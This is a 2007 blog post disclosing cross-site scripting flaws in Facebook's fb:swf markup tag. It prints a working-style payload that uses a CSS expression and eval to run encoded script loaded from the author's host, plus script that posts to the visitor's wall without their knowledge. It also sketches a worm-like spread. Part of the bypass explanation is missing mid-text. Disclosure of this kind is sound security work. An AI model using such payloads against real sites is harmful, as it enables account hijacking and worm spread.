Wednesday, August 15, 2007
Facebook's new-fangled applications functionality seemed like a ripe opportunity for nasty cross-site scripting bugs. As it turns out, multiple XSS vulnerabilities were present in the fb:swf tag of the Facebook Markup Language.
FBML XSS Vulnerabilities
Given that Facebook seems to roll out tons of new functionality all the time without proper security testing and auditing, I was sure there had to be at least a few holes. I finally got the motivation to do some bug hunting while at USENIX Security, where I met a student, Adrienne Felt, from University of Virginia who was presenting at the poster session about an XSS vuln she had found in Facebook. As she wasn't releasing any specific technical details about the vulnerability since it was not yet patched, I found that motivation enough to head back to my hotel and hack on Facebook for the night to see if I could re-discover the hole she had found. In just a couple hours, I had discovered an XSS vulnerability, which I found out the next day was actually different that the one she had discovered.
I created a simple Facebook application to host the proof-of-concept code and demonstrate the vulnerability. The exploit originally used the onmouseover vulnerability but I switched it over to Adrienne's imgstyle attribute after Facebook patched my exploit vector.
Here is the exploit code:
<fb:swf imgsrc="http://jonojono.eecs.umich.edu/test.gif" swfsrc="http://jonojono.eecs.umich.edu/test.swf" waitforclick="true" imgstyle="background-color: expression(eval(unescape('ENCODED JS HERE'))); background-repeat: expression(this.style.background-color='');" />
In order to sneak the code past Facebook's sanitation filters and allow the attack to function against multiple browsers, a few tricks were needed:
will fetch and execute the remore content. Example contents of fb-xss.xml:
var form = document.getElementById('wall_post_form'); form.text.value = 'i heart jon o...and his automatic wall posts!'; ajax_wall_post(ge('wall_post_form'), ge('wall_posts'));
Very short and simple, thanks to Facebook's provided AJAX functions. In this proof-of-concept, as soon as someone visited my profile, it would automatically post to my wall with the included message. It was definitely interesting seeing how many random people visit your profile for no apparent reason every day.
Besides simple, benign actions like automatically posting on a wall, much more malicious attacks are obviously possible. It is possible to perform any action a Facebook user would normally be able to perform, but in an automated and silent manner without their knowledge. Imagine a malicious application hosted on your profile that automatically added itself to anyone's profile who view their page. Then anyone viewing that victim's page would also be infected with the malicious application, resulting in a rapid worm-like spreading behavior.
It's only a matter of time before we see a similar XSS hole exploited on Facebook on a large-scale basis for malicious purposes similar to the Myspace phishing worm. Hopefully, in the future, Facebook will do a better job in auditing their new functionality for vulnerabilities to prevent such a scenario.